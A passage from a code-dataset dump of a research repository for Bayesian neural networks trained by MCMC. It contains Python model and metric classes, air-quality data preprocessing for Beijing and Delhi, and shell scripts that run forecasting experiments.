targets)/(targets+0.0000001)).mean()\n\n\n ######################################################################\n # Mean Absolute Scaled Error\n # This metric make strong assumptions about the structure of the data\n # 1. We assume that the last of the presented features is the \n # NAIVE prediction. This could be the previous known value of \n # the entity we are predicting, or the SEASONAL NAIVE VALUE\n # Either way it is up to you to prepare the data this way.\n # NOTE: Adding a small value to correct for instances when\n # the base error is zero\n ############################################################################\n def mase(self, predictions, targets, features):\n naive_preds = features[:, features.shape[1]-1 ]\n naive_error = np.abs(naive_preds - targets)\n model_error = np.abs(predictions - targets)\n return model_error.sum() / ( naive_error.sum() + 0.0000001 )\n\n ######################################################################\n # Mean Absolute Scaled Error - (Time Series Only) Second Version\n # This metric make strong assumption about the test data\n # 1. That its order in the vector is the order in time\n # 2. That the appropriate naive model is the last target value\n # preceding the current row\n # (in other words we are predicting one time step in advance)\n # NOTE: Adding a small value to correct for instances when\n # the naive error is zero\n ######################################################################\n def mase_version2(self, predictions, targets, features):\n naive_preds = targets[0:len(targets)-1]\n naive_targs = targets[1:len(targets)]\n naive_error = np.abs(naive_preds - naive_targs)\n model_error = np.abs(predictions - targets)\n factor = len(targets) / (len(targets) - 1)\n return model_error.sum() / (factor * naive_error.sum() + 0.000001)\n\n\n ######################################################################\n # INITIALISE THE CACHES USED FOR STORING VALUES USED IN MCMC PROCESS\n ######################################################################\n def initialise_cache(self):\n self.log_likelihood_cache = {}\n self.log_prior_cache = {}\n\n ######################################################################\n # TRANSFORM A WEIGHT VECTOR INTO A KEY THAT WILL BE USED IN THE CACHE\n ######################################################################\n def get_cache_key(self, w):\n return hashlib.md5(str(w).encode('utf-8')).hexdigest()\n\n ######################################################################\n # GET METHOD FOR LOG LIKELIHOOD THAT MAKES USE OF THE CACHE\n ######################################################################\n def get_log_likelihood(self, data, w, tausq):\n tempkey = self.get_cache_key(w)\n if tempkey in self.log_likelihood_cache:\n return self.log_likelihood_cache[tempkey]\n else:\n templl = self.log_likelihood(data, w, tausq)\n self.log_likelihood_cache[tempkey] = templl\n return templl\n\n ######################################################################\n # GET METHOD FOR LOG PRIOR THAT MAKES USE OF THE CACHE\n ######################################################################\n def get_log_prior(self, w, tausq):\n tempkey = self.get_cache_key(w)\n if tempkey in self.log_prior_cache:\n return self.log_prior_cache[tempkey]\n else:\n templp = self.log_prior(w, tausq)\n self.log_prior_cache[tempkey] = templp\n return templp\n\n\n ######################################################################\n # CALCULATE EVERYTHING NEEDED FOR A SINGLE MCMC STEP \n # - PROPOSAL, PREDS, ERROR AND ACCEPTANCE PROBABILITY\n ###########################################################################################################\n def get_proposal_and_acceptance_probability(self, w, eta, tausq, traindata, testdata):\n w_proposal = self.get_proposal_weight_vector(w)\n [eta_pro, tau_pro] = self.get_proposal_tau(eta)\n [pred_train, rmsetrain] = self.evaluate_proposal(traindata, w_proposal)\n [pred_test, rmsetest] = self.evaluate_proposal(testdata, w_proposal)\n mh_prob = self.get_acceptance_probability(w_proposal, tau_pro, w, tausq, traindata)\n return [w_proposal, eta_pro, tau_pro, pred_train, rmsetrain, pred_test, rmsetest, mh_prob]\n\n ######################################################################\n # CALCULATE METROPOLIS HASTINGS ACCEPTANCE PROBABILITY - RANDOM WALK\n #----------------------------------------------------------------------------------------\n # THIS NEXT SECTION INVOLVES CALCULATING: Metropolis-Hastings Acceptance Probability\n # This is what will determine whether a given change to the model weights (a proposal)\n # is accepted or rejected\n # This will consist of the following components\n # 1) A ratio of the likelihoods (current and proposal)\n # 2) A ratio of the priors (current and proposal)\n ###########################################################################################################\n def calculate_metropolis_hastings_acceptance_probability(self, new_w, new_tausq, old_w, old_tausq, data ):\n new_log_prior = self.get_log_prior( new_w, new_tausq)\n new_log_likelihood = self.get_log_likelihood(data, new_w, new_tausq)\n old_log_prior = self.get_log_prior( old_w, old_tausq)\n old_log_likelihood = self.get_log_likelihood(data, old_w, old_tausq)\n diff_likelihood = new_log_likelihood - old_log_likelihood\n diff_prior = new_log_prior - old_log_prior\n logproduct = diff_likelihood + diff_prior\n if logproduct > 709:\n logproduct = 709\n difference = math.exp(logproduct)\n mh_prob = min(1, difference)\n return mh_prob\n\n\n"
},
{
"alpha_fraction": 0.47745969891548157,
"alphanum_fraction": 0.4836020767688751,
"avg_line_length": 41.793426513671875,
"blob_id": "0a40f0ffd58ac1ce1c76bda8bd94c7bdf9ae412b",
"content_id": "eea9a5f053a6cd68b4d85cc21133d18391abba30",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9117,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 213,
"path": "/src/DeepFFNN.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport random\nimport time\nimport math\nfrom NeuralNetwork import NeuralNetwork\n\n#-------------------------------------------------------------------------------\n# DEFINE A DEEP NEURAL NETWORK CLASS\n# WITH THE ARCHITECTURE WE REQUIRE\n# AND METHODS THAT MAKE IT AMENABLE TO BAYESIAN ML PROCESSES\n#-------------------------------------------------------------------------------\nclass DeepFFNN(NeuralNetwork):\n\n def __init__(self, input, hidden, output, max_depth, output_act, eval_metric):\n\n self.hidden = hidden\n self.max_depth = max_depth\n NeuralNetwork.__init__(self, input, output, output_act, eval_metric)\n\n self.w_size = self.get_weight_vector_length()\n\n self.initialise_cache()\n\n # WEIGHTS FROM INPUT TO FIRST HIDDEN LAYER \n self.W1 = np.random.randn(self.input, self.hidden) / np.sqrt(self.input)\n self.B1 = np.random.randn(1, self.hidden) / np.sqrt(self.hidden)\n\n # WEIGHTS FROM LAST HIDDEN LAYER TO OUTPUT LAYER \n self.W2 = np.random.randn(self.hidden, self.output) / np.sqrt(self.hidden)\n self.B2 = np.random.randn(1, self.output) / np.sqrt(self.hidden) \n\n self.out = np.zeros((1, self.output)) # output layer for base model\n\n # NOW LETS CREATE ALL OF THE HIDDEN LAYERS\n self.h_weights = []\n self.h_biases = []\n self.h_out = []\n for layer in range(self.max_depth):\n self.h_weights.append(np.random.randn(self.hidden, self.hidden) / np.sqrt(self.hidden))\n self.h_biases.append(np.random.randn(1, self.hidden) / np.sqrt(self.hidden) )\n self.h_out.append(np.zeros((1, self.hidden)) )\n\n self.final_out = np.zeros((1, self.output)) # Final output for the model\n\n ######################################################################\n # PRINT THE ARCHITECTURE\n ######################################################################\n def print(self):\n print(\"Bayesian Deep Feed Forward Neural Network\")\n print(\"Input Nodes:\", self.input)\n print(\"Hidden Nodes:\", self.hidden)\n print(\"Hidden Layers:\", self.max_depth)\n print(\"Output Nodes:\", self.output)\n\n\n\n ######################################################################\n # PASS DATA X THROUGH THE NETWORK TO PRODUCE AN OUTPUT\n ######################################################################\n def forward_pass(self, X):\n # INPUT LAYER FIRST\n z1 = X.dot(self.W1) - self.B1\n # OUTPUT OF THE FIRST HIDDEN NODES\n tempout = self.sigmoid(z1) \n # NOW THE ADDITIONAL HIDDEN LAYERS\n for layer in range(self.max_depth):\n tempz1 = tempout.dot(self.h_weights[layer]) - self.h_biases[layer]\n tempout = self.sigmoid(tempz1)\n self.h_out[layer] = tempout\n z2 = tempout.dot(self.W2) - self.B2\n self.out = self.sigmoid(z2)\n self.final_out = self.out\n return self.final_out\n\n ######################################################################\n # TAKE A SINGLE VECTOR OF FLOATING POINT NUMBERS AND USE IT TO \n # SET THE VALUES OF ALL WEIGHTS AND BIASES\n ######################################################################\n def decode(self, w):\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n internal_layer_wts = self.hidden * self.hidden\n\n start_index = 0\n w_layer1 = w[start_index:input_layer_wts]\n self.W1 = np.reshape(w_layer1, (self.input, self.hidden))\n start_index = start_index + input_layer_wts\n\n self.B1 = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n w_layer2 = w[start_index: start_index + output_layer_wts]\n self.W2 = np.reshape(w_layer2, (self.hidden, self.output))\n start_index = start_index + output_layer_wts\n\n self.B2 = w[start_index:start_index + self.output]\n start_index = start_index + self.output\n\n # ALL OF THE ADDITIONAL HIDDEN LAYER WEIGHTS AT THE END OF THE VECTOR \n for layer in range(self.max_depth):\n w_layer_temp = w[start_index: start_index + internal_layer_wts]\n self.h_weights[layer] = np.reshape(w_layer_temp, (self.hidden, self.hidden))\n start_index = start_index + internal_layer_wts\n self.h_biases[layer] = w[start_index:start_index + self.hidden]\n start_index = start_index + self.hidden\n\n\n ######################################################################\n # PROCESS DATA\n # RUN A NUMBER OF EXAMPLES THROUGH THE NETWORK AND RETURN PREDICTIONS\n ######################################################################\n def process_data(self, data): \n size = data.shape[0]\n Input = np.zeros((1, self.input)) # temp hold input\n Desired = np.zeros((1, self.output))\n fx = np.zeros(size)\n for pat in range(0, size):\n Input[:] = data[pat, 0:self.input]\n Desired[:] = data[pat, self.input:]\n self.forward_pass(Input)\n fx[pat] = self.final_out\n return fx\n\n\n ######################################################################\n # EVALUATE PROPOSAL\n # THIS METHOD NEEDS TO SET THE WEIGHT PARAMETERS\n # THEN PASS THE SET OF DATA THROUGH THE NETWORK AND\n # FINALLY CALCULATING THE RMSE\n ######################################################################\n def evaluate_proposal(self, data, w):\n self.decode(w)\n fx = self.process_data(data)\n y = data[:, self.input]\n feats = data[:, :self.input]\n metric = self.eval(fx, y, feats)\n return [fx, metric]\n\n\n ######################################################################\n # LOG LIKELIHOOD\n # CALCULATED GIVEN\n # - A PROPOSED SET OF WEIGHTS\n # - A DATA SET\n # - AND THE PARAMETERS FOR THE ERROR DISTRIBUTION\n ######################################################################\n def log_likelihood(self, data, w, tausq):\n y = data[:, self.input]\n [fx, rmse] = self.evaluate_proposal(data, w)\n loss = -0.5 * np.log(2 * math.pi * tausq) - 0.5 * np.square(y - fx) / tausq\n return np.sum(loss)\n\n\n ######################################################################\n # LOG PRIOR\n ######################################################################\n def log_prior(self, w, tausq):\n h = self.hidden # number hidden neurons in each layer.\n tot_h = h * (self.max_depth+1)\n d = self.input # number input neurons\n part1 = -1 * ((d * tot_h + tot_h + 2) / 2) * np.log(self.sigma_squared)\n part2 = 1 / (2 * self.sigma_squared) * (sum(np.square(w)))\n logp = part1 - part2 - (1 + self.nu_1) * np.log(tausq) - (self.nu_2 / tausq)\n return logp\n\n\n ######################################################################\n # GET THE COMPLETE LENGTH OF THE ENCODED WEIGHT VECTOR\n ######################################################################\n def get_weight_vector_length(self):\n start_index = 0\n input_layer_wts = self.input * self.hidden\n output_layer_wts = self.hidden * self.output\n internal_layer_wts = self.hidden * self.hidden\n start_index = start_index + input_layer_wts\n start_index = start_index + self.hidden\n start_index = start_index + output_layer_wts\n start_index = start_index + self.output\n for layer in range(self.max_depth):\n start_index = start_index + internal_layer_wts\n start_index = start_index + self.hidden\n return start_index\n\n\n ######################################################################\n # GET NEW PROPOSAL WEIGHT VECTOR BY MODIFYING AN EXISTING ONE\n ######################################################################\n def get_proposal_weight_vector(self, w):\n w_proposal = w + np.random.normal(0, self.step_w, self.w_size)\n return w_proposal\n\n ######################################################################\n # GET PROPOSAL TAU VALUE FOR ERROR DISTRIBUTION\n ######################################################################\n def get_proposal_tau(self, eta):\n eta_pro = eta + np.random.normal(0, self.step_eta, 1)\n tau_pro = math.exp(eta_pro)\n return [eta_pro, tau_pro]\n\n\n ######################################################################\n # ACCEPTANCE PROBABILITY - METROPOLIS HASTINGS\n ######################################################################\n def get_acceptance_probability(self, new_w, new_tausq, old_w, old_tausq, data ):\n return self.calculate_metropolis_hastings_acceptance_probability(new_w, new_tausq, old_w, old_tausq, data)\n\n ######################################################################\n # GET THE WEIGHT VECTOR\n ######################################################################\n def get_weight_vector(self):\n mytemp = [get_weight_vector_length()]\n # TODO\n return mytemp\n\n\n"
},
{
"alpha_fraction": 0.6191467046737671,
"alphanum_fraction": 0.6722164154052734,
"avg_line_length": 67.57142639160156,
"blob_id": "050aa95efafcaac46b76c16f18dbe14795df6613",
"content_id": "3e7b2010b97434b380a126a292fbe5193ac03b69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 961,
"license_type": "no_license",
"max_line_length": 303,
"num_lines": 14,
"path": "/experiments/RUN_BeiJing_24hr_SLP.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\n# BeiJing Air Quality \n \npython3 ./train_bn_mcmc.py 53 0 1 0 SLP sigmoid data/Beijing/sets/Train_24_hour_norm.csv data/Beijing/sets/Test_24_hour_norm.csv results/Beijing_SLP_24Hr_Sigmoid/ MASE 100000\n\n##############################################################################################################\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_SLP_24Hr_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_SLP_24Hr_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" \"data/Beijing/sets/Target_24_nzr_config.yaml\" True False False False \"TARGET_pm2.5_24_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_SLP_24Hr_Sigmoid\" \"./results/Beijing_SLP_24Hr_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_24_hour_full.csv\" 50000 \"TARGET_pm2.5_24_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.5359683632850647,
"alphanum_fraction": 0.5478261113166809,
"avg_line_length": 29.780487060546875,
"blob_id": "0e1eae072f0db9ad4a38a850fafa758770e4b71e",
"content_id": "906661e6bf9de35e956f3816f647e025854debab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1265,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 41,
"path": "/analysis/summarise_features.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport pandas as pd\n\ndf = pd.read_csv('sets/Train_set_24_hour_full.csv', sep=\" \")\n\ncolnames = df.columns\n\nrecords = len(df)\n\nprint(\"\\\\begin{table}[h!]\")\nprint(\" \\\\begin{center}\")\nprint(\" \\\\caption{Feature Summary}\")\nprint(\" \\\\label{tab:table1}\")\nprint(\" \\\\begin{tabular}{l|l|r|r|r|r} \")\nprint(\" \\\\textbf{Col Name} & \\\\textbf{Type} & \\\\textbf{Missing \\%} & \\\\textbf{Min} & \\\\textbf{Mean} & \\\\textbf{Max}\\\\\\\\\")\nprint(\" \\\\hline\")\n\nfor name in colnames:\n # NEED TO ESCAPE UNDERSCORES IN LATEX\n newname = name.replace('_', '\\_')\n nacount = len(df[df[name].isna()])\n napercent = round(100*nacount/records,3)\n valtype = \"Char\"\n thetype = str(type(df.loc[1,name]))\n if thetype == \"<class 'numpy.float64'>\" :\n valtype = \"Real\"\n if thetype == \"<class 'numpy.int64'>\" :\n valtype = \"Int\"\n if (valtype != \"Char\") :\n themin = round(df[name].min(),3)\n themean = round(df[name].mean(),3)\n themax = round(df[name].max(),3)\n else:\n themin = \"-\"\n themean = \"-\"\n themax = \"-\"\n print(\" \", newname, \"&\", valtype, \"&\", napercent, \"&\", themin, \"&\", themean, \"&\", themax, \"\\\\\\\\\")\n\nprint(\" \\\\end{tabular}\")\nprint(\" \\\\end{center}\")\nprint(\"\\\\end{table}\")\n\n\n\n"
},
{
"alpha_fraction": 0.5500586032867432,
"alphanum_fraction": 0.5791324973106384,
"avg_line_length": 39.09434127807617,
"blob_id": "eccd486db6bac6ea800cbd82952bd82fd902f696",
"content_id": "c55f3b1cfe42172de7812ea08a72b3ea2000b78b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4265,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 106,
"path": "/data/Delhi/process.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport numpy as np\nimport re\n\n# HELPER FUNCTION FOR INCONSISTENT DATA FORMATS \ndef clean_date(date_val): \n if re.search('\\/.*', date_val): \n month, day, year = re.split(\"\\/\", date_val) \n if len(year) == 4:\n year = year[2:]\n return day + \"-\" + month + \"-\" + year\n else: \n return date_val \n\nMISSING = object()\n# HELPER FUNCTION TO FILL IN THE MISSING DATES\ndef insert_missing_dates(df, date_field, other_col=MISSING):\n maxdate = max(df[date_field])\n mindate = min(df[date_field])\n mydates = pd.date_range(mindate, maxdate)\n if other_col == MISSING:\n temp = mydates.to_frame(index=False)\n temp.columns=[date_field]\n new_df = pd.merge(temp, df, how='left', left_on=[date_field], right_on = [date_field])\n else:\n newdf = pd.DataFrame()\n vals = df[other_col].unique()\n for i in range(len(vals)):\n for j in range(len(mydates)):\n newdf = newdf.append({other_col: vals[i], date_field: mydates[j]}, ignore_index=True)\n new_df = pd.merge(newdf, df, how='left', left_on=[date_field, other_col], right_on = [date_field, other_col])\n return new_df\n\n\n\ndf1 = pd.read_csv('cpcb_dly_aq_delhi-2011.csv')\ndf2 = pd.read_csv('cpcb_dly_aq_delhi-2012.csv')\ndf3 = pd.read_csv('cpcb_dly_aq_delhi-2013.csv')\ndf4 = pd.read_csv('cpcb_dly_aq_delhi-2014.csv')\ndf5 = pd.read_csv('cpcb_dly_aq_delhi-2015.csv')\n \n# DIFFERENT DATE FORMATS IN THE RAW DATA. NEED TO CLEAN FIRST\ndf1['Date'] = pd.to_datetime(df1['Sampling Date'], format='%d/%m/%Y')\ndf2['Date'] = pd.to_datetime(df2['Sampling Date'], format='%d/%m/%Y')\ndf3['tempdate'] = df3['Sampling Date'].apply( clean_date ) \ndf3['Date'] = pd.to_datetime(df3['tempdate'], format='%d-%m-%y')\ndf4['Date'] = pd.to_datetime(df4['Sampling Date'], format='%d-%m-%y')\ndf5['Date'] = pd.to_datetime(df5['Sampling Date'], format='%d-%m-%y')\n\n# NOW JOIN\ndfj = df1.append([df2,df3,df4,df5])\n\n# ADD INDICATOR COLUMNS FOR LOCATION\ndfj['Residential'] = np.where(dfj['Type of Location']=='Residential, Rural and other Areas',1,0)\ndfj['Industrial'] = np.where(dfj['Type of Location']=='Industrial Area',1,0)\n\n\nkeep_cols = ['Date', 'Stn Code', 'Residential', 'Industrial', 'SO2', 'NO2', 'RSPM/PM10']\ndf = dfj.loc[:,keep_cols]\n\nexpanded = insert_missing_dates(df, 'Date', other_col='Stn Code')\n\nnew_names = ['Date', 'Stn Code', 'Residential', 'Industrial', 'SO2', 'NO2', 'PM10']\nexpanded.columns = new_names\n\nexpanded.to_csv( 'delhi_pm10_stations_ALL_2011_2015.csv', header=True, index=False )\n\n\n# ##########################################################################\n# EXTRACT OUT THE INDIVIDUAL SERIES IN THE DATA AND SAVE\n\n \n# REMOVING\n#stations = df['Stn Code'].unique()\n#for stat in stations:\n# temp = expanded[ expanded['Stn Code']==stat ]\n# filename = 'delhi_pm10_station_%s_2011_2015.csv' % str(stat)\n# temp.to_csv(filename, header=True, index=False)\n\n# #############################################################################\n# BUILD ONE DATASET WITH EACH OF THE PM10 STATION READINGS AS FEATURES\n# ONLY USING A SUBSET OF STATIONS AS THE OTHERS ARE MISSING SEVERAL YEARS\n################################################################################\ngood_stations = [144, 146, 345]\nbase = pd.DataFrame()\nfor stat in good_stations:\n if len(base) == 0 :\n temp = expanded[ expanded['Stn Code']==stat ]\n temp2 = temp.loc[:,['Date','PM10', 'SO2', 'NO2']]\n col1_name = 'STN_%s_PM10' % str(stat)\n col2_name = 'STN_%s_SO2' % str(stat)\n col3_name = 'STN_%s_NO2' % str(stat)\n temp2.columns = ['Date', col1_name, col2_name, col3_name]\n base = temp2\n else :\n temp = expanded[ expanded['Stn Code']==stat ]\n temp2 = temp.loc[:,['Date','PM10', 'SO2', 'NO2']]\n col1_name = 'STN_%s_PM10' % str(stat)\n col2_name = 'STN_%s_SO2' % str(stat)\n col3_name = 'STN_%s_NO2' % str(stat)\n temp2.columns = ['Date', col1_name, col2_name, col3_name]\n new_df = pd.merge(base, temp2, how='left', left_on=['Date'], right_on = ['Date'])\n base = new_df \n\nfilename = 'delhi_pm10_all_stations_wide.csv'\nbase.to_csv(filename, header=True, index=False)\n\n\n\n\n \n"
},
{
"alpha_fraction": 0.7116279006004333,
"alphanum_fraction": 0.7720929980278015,
"avg_line_length": 77.09091186523438,
"blob_id": "a4d46213930773d363780dd14d54563e2604988b",
"content_id": "c830d4988057f605f22e4ad10babd2f8787be96b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 860,
"license_type": "no_license",
"max_line_length": 314,
"num_lines": 11,
"path": "/experiments/RUN_BeiJing_7day_LangevinFFNN.sh",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\ncd ../\n\npython3 ./train_bn_mcmc.py 28 10 1 0 LangevinFFNN sigmoid data/Beijing/sets/Train_168_hour_norm.csv data/Beijing/sets/Test_168_hour_norm.csv results/Beijing_7day_LvnFFNN_Sigmoid/ MASE 10000\n\n# PROCESS THE RESULTS SO THAT THEY ARE IN THE TARGET SPACE (DEAL WITH NORMALISED OR DIFFERENCED TARGETS)\n \npython3 ./transform_test_results.py \"./results/Beijing_7day_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./results/Beijing_7day_LvnFFNN_Sigmoid/test_predictions.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" \"data/Beijing/sets/Target_168_nzr_config.yaml\" True False False False \"TARGET_pm2.5_168_VALUE\" \"pm2.5\" \n\npython3 analyse_test_results.py \"./results/Beijing_7day_LvnFFNN_Sigmoid\" \"./results/Beijing_7day_LvnFFNN_Sigmoid/test_predictions_final.tsv\" \"./data/Beijing/sets/Test_168_hour_full.csv\" 5000 \"TARGET_pm2.5_168_VALUE\" \"pm2.5\"\n\n"
},
{
"alpha_fraction": 0.5374601483345032,
"alphanum_fraction": 0.5619450211524963,
"avg_line_length": 39.55244827270508,
"blob_id": "3c058cc91e95fa1cbb3d568a1c2d0977d0dd7cdf",
"content_id": "52ddfeb99754ef402b7b42a76a6156a7cfce3c92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 11599,
"license_type": "no_license",
"max_line_length": 154,
"num_lines": 286,
"path": "/train_bn_mcmc.py",
"repo_name": "john-hawkins/Bayesian_Neural_Networks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/python\nimport sys\nsys.path.append('src')\n\n#import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\nimport random\nimport time\nimport sys\nimport os\nimport SLP as slp\nimport FFNN as ffnn\nimport LangevinFFNN as lgvnffnn\nimport MCMC as mcmc\nimport DeepFFNN as deepffnn\n#import DeepGBFFNN as deepgbffnn\n\n#################################################################################\n# TRAIN A BAYESIAN NEURAL NETWORK \n# PARAMETERS\n# - INPUT NODES\n# - HIDDEN NODES\n# - OUTPUT NODES\n# - MAXIMUM DEPTH\n# - NETWORK ARCHITECTURE\n# - OUTPUT ACTIVATION\n# - PATH TO TRAINING DATA\n# - PATH TO TESTING DATA\n# - PATH TO RESULTS\n# - EVAL METRIC\n# - EPOCHS\n# - SEED (OPTIONAL)\n#################################################################################\ndef main():\n print(\"length: \", len(sys.argv) )\n if len(sys.argv) < 12:\n print(\"ERROR: MISSING ARGUMENTS\")\n print_usage(sys.argv)\n exit(1)\n else:\n input = int(sys.argv[1])\n hidden = int(sys.argv[2])\n output = int(sys.argv[3])\n depth = int(sys.argv[4])\n architecture = sys.argv[5]\n activation = sys.argv[6]\n train_path = sys.argv[7]\n test_path = sys.argv[8]\n results_path = sys.argv[9]\n eval_metric = sys.argv[10]\n epochs = int(sys.argv[11])\n if len(sys.argv) > 12:\n rand_seed = sys.argv[12]\n else:\n rand_seed = 0\n np.random.seed(rand_seed)\n\n train_model(input, hidden, output, depth, architecture, activation, train_path, test_path, results_path, eval_metric, epochs)\n\n#################################################################################\ndef print_usage(args):\n print(\"USAGE \")\n print(args[0], \"<INPUT NODES> <HIDDEN NODES> <OUTPUT NODES> <DEPTH> <ARCH> <ACTIVATION> <TRAIN> <TEST> <RESULTS DIR> <EVAL METRIC> <EPOCHS> (<SEED>)\")\n print(\"Valid model architectures: SLP FFNN DeepFFNN LangevinFFNN \")\n print(\"Valid output activation functions: linear sigmoid tanh relu\")\n print(\"Valid eval metrics: RMSE MAE MAPE MASE MASEb\")\n print(\"NOTE\")\n print(\"THE NUMBER OF COLUMNS IN THE TRAIN AND TEST DATA MUST BE EQUAL TO INPUT PLUS OUTPUT NODES.\")\n\n\n#################################################################################\n# CREATE RESULTS DIRECTORY IF NEEDED\n#################################################################################\ndef ensure_resultsdir(results_dir):\n print(\"testing for \", results_dir)\n directory = os.path.abspath(results_dir)\n if not os.path.exists(directory):\n print(\"Does not exist... creating\")\n os.makedirs(directory)\n\n\n#################################################################################\n# TRAIN THE MODELS\n#################################################################################\ndef train_model(input, hidden, output, depth, architecture, activation, train_path, test_path, results_path, eval_metric, epochs):\n ensure_resultsdir(results_path)\n rezfile = results_path + \"results.txt\"\n outres = open(rezfile, 'w')\n traindata = np.loadtxt(train_path)\n testdata = np.loadtxt(test_path)\n\n if architecture == 'DeepGBFFNN':\n neuralnet = deepgbffnn.DeepGBFFNN(input, hidden, output, depth, 0.05, activation, eval_metric)\n elif architecture == 'DeepFFNN':\n neuralnet = deepffnn.DeepFFNN(input, hidden, output, depth, activation, eval_metric)\n elif architecture == 'LangevinFFNN':\n neuralnet = lgvnffnn.LangevinFFNN(input, hidden, output, activation, eval_metric)\n elif architecture == 'SLP':\n neuralnet = slp.SLP(input, output, activation, eval_metric)\n else:\n neuralnet = ffnn.FFNN(input, hidden, output, activation, eval_metric)\n\n neuralnet.print()\n\n random.seed( time.time() )\n num_samples = epochs\n\n start_time = time.time()\n\n estimator = mcmc.MCMC(num_samples, traindata, testdata, neuralnet, results_path, eval_metric) \n estimator.print()\n [pos_w, pos_tau, eval_train, eval_test, accept_ratio, test_preds_file] = estimator.sampler()\n print(\"\\nMCMC Training Complete\")\n print(\"- Execution Time: %.2f seconds \" % (time.time() - start_time))\n\n burnin = int(0.1 * num_samples) \n use_samples = burnin\n\n burn_x = []\n burn_y = []\n\n burnfile = results_path + \"burnin.tsv\"\n outburn = open(burnfile, 'w')\n outburn.write(\"Burnin\\t\" + eval_metric + \"\\r\\n\") \n for i in range( int((num_samples-use_samples)/burnin)):\n burner = (i+1)*burnin\n endpoint = burner + use_samples\n eval_temp = np.mean(eval_test[int(burner):endpoint])\n burn_x.append(burner)\n burn_y.append( eval_temp )\n outburn.write(\"%f\\t%f\\r\\n\" % (burner, eval_temp) )\n\n outburn.close()\n\n burnin = num_samples - use_samples\n\n pos_w = pos_w[int(burnin):, ]\n \n eval_tr = np.mean(eval_train[int(burnin):])\n evaltr_std = np.std(eval_train[int(burnin):])\n eval_tst = np.mean(eval_test[int(burnin):])\n evaltest_std = np.std(eval_test[int(burnin):])\n outres.write(\"Train \" + eval_metric + \"\\t%f\\r\\n\" % eval_tr)\n outres.write(\"Train \" + eval_metric + \" Std\\t%f\\r\\n\" % evaltr_std)\n outres.write(\"Test \" + eval_metric + \"\\t%f\\r\\n\" % eval_tst)\n outres.write(\"Test \" + eval_metric + \" Std\\t%f\\r\\n\" % evaltest_std)\n outres.write(\"Accept Ratio\\t%f\\r\\n\" % accept_ratio)\n outres.close()\n\n write_weights( pos_w, results_path )\n #create_weight_boxplot( pos_w, results_path )\n\n create_test_forecast_bands(burnin, input, test_preds_file, testdata, results_path)\n\n\n#################################################################################\n# PLOT CONFIDENCE INTERVAL\n#################################################################################\ndef plot_timeseries_confidence_intervals( burnin, eval_train, eval_test, results_path ):\n\n fx_train_final = eval_train[int(burnin):, ]\n fx_test_final = eval_test[int(burnin):, ]\n\n fx_mu = fx_test_final.mean(axis=0)\n fx_high = np.percentile(fx_test_final, 95, axis=0)\n fx_low = np.percentile(fx_test_final, 5, axis=0)\n \n fx_mu_tr = fx_train_final.mean(axis=0)\n fx_high_tr = np.percentile(fx_train_final, 95, axis=0)\n fx_low_tr = np.percentile(fx_train_final, 5, axis=0)\n \n ytestdata = testdata[:, input]\n ytraindata = traindata[:, input]\n \n plt.plot(x_test, ytestdata, label='actual')\n plt.plot(x_test, fx_mu, label='pred. (mean)')\n plt.plot(x_test, fx_low, label='pred.(5th percen.)')\n plt.plot(x_test, fx_high, label='pred.(95th percen.)')\n plt.fill_between(x_test, fx_low, fx_high, facecolor='g', alpha=0.4)\n plt.legend(loc='upper right')\n \n plt.title(\"Plot of Test Data vs MCMC Uncertainty \")\n plt.savefig(results_path + 'mcmcrestest.png')\n plt.savefig(results_path + 'mcmcrestest.svg', format='svg', dpi=600)\n plt.clf()\n\n plt.plot(x_train, ytraindata, label='actual')\n plt.plot(x_train, fx_mu_tr, label='pred. (mean)')\n plt.plot(x_train, fx_low_tr, label='pred.(5th percen.)')\n plt.plot(x_train, fx_high_tr, label='pred.(95th percen.)')\n plt.fill_between(x_train, fx_low_tr, fx_high_tr, facecolor='g', alpha=0.4)\n plt.legend(loc='upper right')\n\n plt.title(\"Plot of Train Data vs MCMC Uncertainty \")\n plt.savefig(results_path + 'mcmcrestrain.png')\n plt.savefig(results_path + 'mcmcrestrain.svg', format='svg', dpi=600)\n plt.clf()\n\n#################################################################################\n# WRITE OUT THE WEIGHTS \n#################################################################################\ndef write_weights( pos_w, results_path ):\n np.savetxt( results_path + 'weights.csv', pos_w, delimiter=',')\n\n\n#################################################################################\n# SOME PLOTTTING FUNCTION \n#################################################################################\ndef create_weight_boxplot( pos_w, results_path ):\n mpl_fig = plt.figure()\n ax = mpl_fig.add_subplot(111)\n\n ax.boxplot(pos_w)\n 